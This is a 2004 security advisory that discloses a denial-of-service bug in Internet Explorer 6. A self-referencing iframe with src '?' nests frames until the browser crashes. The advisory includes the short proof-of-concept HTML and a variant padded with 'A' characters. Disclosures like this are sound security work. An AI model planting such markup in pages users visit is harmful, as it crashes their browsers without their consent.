Formal Report
#########################################
Application:    Internet Explorer
Vendors:         http://www.microsoft.com 
Version:          6.0.2800
Platforms:       Windows
Bug:                Crash(D.O.S) 
Risk:                Low 
Exploitation:     Local with browser
Date:               7 Apr 2004
Author:            Emmanouel Kellinis
e-mail:             me@cipher(dot)org(dot)uk
web:               http://www.cipher.org.uk 
List :               BugTraq(SecurityFocus)
#########################################

=======
Product
=======
A popular Web browser, created by Microsoft, 
used to view pages on the World Wide Web.

===
Bug
===
Iframe element(TAG) creates an inline frame 
that contains another document. If you use the
character '?' as the document , Internet explorer
starts an infinite loop of IFrames inside Iframes , 
this causes IE's crash. 


=====================
Proof Of Concept Code
=====================

Create a web page and you add an IFRAME which 
points to --> ?
  
Example : <  iframe src= " ? "  >
   
Crashes completely IE 6 in about 20 secs and consumes 
more than 24 MBs of RAM and uses 99% of the CPU power.
Additionally, memory consumption and Crashing time 
can vary , depending on how many characters you add 
after the '?' character. 

<  iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA "  >


Emmanouel Kellinis
http://www.cipher.org.uk 


=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt 
=========================================================